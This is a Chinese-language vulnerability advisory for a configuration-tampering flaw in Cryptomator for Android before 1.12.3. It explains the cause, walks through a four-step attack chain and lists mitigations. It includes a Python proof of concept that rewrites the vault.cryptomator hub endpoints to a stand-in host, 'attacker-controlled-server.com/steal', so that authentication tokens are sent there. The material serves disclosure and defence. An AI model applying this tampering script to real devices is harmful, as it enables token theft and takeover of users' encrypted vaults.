CVE-2026-32317 Cryptomator Android配置篡改漏洞

漏洞信息

漏洞编号

CVE-2026-32317

漏洞类型

配置篡改

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Cryptomator for Android

漏洞概述

Cryptomator for Android在1.12.3版本之前存在严重的完整性检查漏洞。该漏洞允许攻击者篡改加密库的配置文件，从而在Hub密钥加载机制中引发中间人攻击。由于客户端在未验证主机真实性的情况下盲目信任配置文件中的端点，攻击者能够将合法的认证端点与恶意的API端点混合，进而窃取用户的认证令牌。此问题主要影响那些在攻击者能够修改vault.cryptomator文件的环境中，使用受影响版本解锁Hub支持加密库的用户。

技术细节

该漏洞的核心成因在于Cryptomator for Android在版本1.12.3之前，对vault.cryptomator配置文件缺乏足够的完整性保护机制。应用程序在加载Hub密钥配置时，默认信任该配置文件中指定的远程端点，且未执行严格的主机真实性校验（如SSL Pinning或证书验证）。在攻击场景中，如果攻击者能够修改用户设备上的vault.cryptomator文件（例如在设备已Root或存在其他本地提权漏洞的情况下），便可以篡改其中的API端点地址。利用时，攻击者将恶意服务器地址注入配置文件。当用户使用受影响版本的客户端尝试解锁Hub支持的加密库时，客户端会连接到攻击者控制的服务器而非合法服务器。此时，认证过程中产生的敏感令牌会被发送给攻击者，导致账户接管或数据泄露风险。

攻击链分析

STEP 1

步骤1：获取文件访问权限

攻击者通过物理接触、恶意应用或其他漏洞获取对Android设备存储的写入权限，定位到vault.cryptomator配置文件。

STEP 2

步骤2：篡改配置文件

攻击者修改vault.cryptomator文件，将其中的Hub认证端点（API Endpoint）替换为攻击者控制的恶意服务器地址。

STEP 3

步骤3：等待用户交互

攻击者诱导或等待用户使用受影响版本的Cryptomator客户端解锁加密库。

STEP 4

步骤4：令牌窃取

客户端在加载配置时，连接到恶意服务器进行认证，导致认证令牌（Token）被发送并截获，攻击者利用该令牌访问用户数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import json

# Simulating the vulnerability where an attacker modifies the vault config
# Original config file path usually: /storage/emulated/0/.../vault.cryptomator

def tamper_vault_config(file_path, malicious_api_url):
    try:
        with open(file_path, 'r') as f:
            config_data = json.load(f)

        # Check if hub key configuration exists
        if "hub" in config_data and "keyId" in config_data["hub"]:
            print("[*] Original Hub config found.")

            # Tamper the endpoint to point to malicious server
            # Note: The actual structure depends on the specific implementation, 
            # this is a conceptual PoC.
            if "endpoints" in config_data["hub"]:
                config_data["hub"]["endpoints"]["auth"] = malicious_api_url
                config_data["hub"]["endpoints"]["api"] = malicious_api_url
            else:
                # Injecting malicious endpoint if structure allows
                config_data["hub"]["backendUrl"] = malicious_api_url

            # Write the tampered config back
            with open(file_path, 'w') as f:
                json.dump(config_data, f, indent=4)

            print(f"[+] Vault configuration tampered successfully. New endpoint: {malicious_api_url}")
            print("[+] Next time the user unlocks the vault, credentials will be sent to the malicious endpoint.")
    except FileNotFoundError:
        print("[-] Vault configuration file not found.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

# Example Usage
# tamper_vault_config("vault.cryptomator", "http://attacker-controlled-server.com/steal")

影响范围

Cryptomator for Android < 1.12.3

防御指南

临时缓解措施

如果无法立即升级，用户应确保Android设备安全，防止未授权的物理访问或应用获取存储写入权限。避免在已Root或安全性未知的环境中使用Hub功能解锁加密库，并定期检查配置文件的修改时间。